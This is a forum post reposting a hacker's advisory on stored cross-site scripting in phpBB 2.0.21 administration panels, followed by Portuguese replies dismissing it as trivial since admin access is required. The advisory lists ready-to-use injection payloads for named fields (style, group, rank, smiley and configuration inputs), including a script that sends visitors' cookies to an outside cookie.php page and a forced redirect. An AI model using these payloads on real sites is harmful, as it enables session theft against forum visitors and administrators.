FORUM DARKERS

phpBB 2.0.21 XSS in administration

**********************************


//-- By Blwood [renatrix@gmail.com]

//-- [ http://www.blwood.net ]

//--


Style Admin

-----------


Management & Create a theme


Lots of input are not properly "filtrate" like style_name, head_stylesheet, body_background, tr_color1_name (all the input in simple name)...


We cand ofcourse inject html in this way : "><h1>Owned by Blwood :P</h1>

but it's more interresting to inject javascript :) :

"><body onload="alert('Owned by Blwood')"> => style_name

"><script>alert('Owned by Blwood')</script> => head_stylesheet, body_background, ...

When an admin will go in Style Administration he will be Owned. (inject in style_name)

When an admin will edit a them he will be Owned.



Group Administration

--------------------


Management


Input group_description is not correctly "filtrated" we can inject js like this : "><script>alert('Owned by Blwood')</script> or </textare>"><script>alert('Owned by Blwood')</script>

When an admin will go in Group administration he'll be owned. But what's more, the groups can be seen in groupcp.php

by every visitors.

An exploit could be :

</textarea>"><script>document.location='http://127.0.0.1/cookie.php?'+document.cookie</script>

or

</textarea>"><script>document.location='http://site.com/ownedpage.html'</script>


Ranks

-----


Rank Administration


Rank Title (input title) is not correctly filtrated, we can inject js like : "><script>alert('xss')</script>

But what's interresting, if you give this rank to an user, the rank will appear in user's topics and the code will be executed when someone sees a topic :)

Now you can inject what you want but maximum 40 caracters...




Smilies

-------


Smiles Editing Utility


Smiley Code : "><body onload="alert('Owned by Blwood')">


Configuration

-------------


General Configuartion


Inputs are not correctyle filtrated : Ex : allow_html_tags  => "><script>alert('Owned by Blwood')</script>



[ Video ]


http://www.blwood.net/advisory/phpbb2021xssadmin.rar (http://www.blwood.net/advisory/phpbb2021xssadmin.rar)

CARAMBA, mais que cara burro esse do video, ele não descobriu XSS nenhum, administradores podem colocar javascript e HTML aonde eles quiserem no forum, tem gente que não merece o ar que respira, isso que ele fez é a mesma coisa de você mesmo ir e ownar o seu próprio site, por que você vai ter que ter a senha do admin pra fazer isso, simplesmente ridiculo...

Cara,

Ele quiz mostrar como, você pode brincar com a cara do admin, he he he
Para você conseguir o painel do admin aí é com você


ate mais

Sim cara, mais dai a falar "Eu descobri um XSS no phpBB 2.0.21" e "(input) is not correctly filtrated", da pra fazer isso não só no phpBB como em quase qualquer forum...

QuoteWhen an admin will go in Style Administration he will be Owned. (inject in style_name)

When an admin will edit a them he will be Owned.

Ele diz, "Quando um admin for editar isso ele será ownado" eu me pergunto mais como, com uma msgbox deixada por outro admin dizendo "Owned by Blwood".

Isso é que nem aquelas vulnerabilidades que de vez em quando os caras acham no cpanel ou no  WHM, de que adianta uma vuln que só o admin do sistema vai ter poder explorar...

Fui olhar o site do cara blwood.net, 10 tutos de perl pra ensinar printf...

Mais você fez bem em exportar isso pra ca...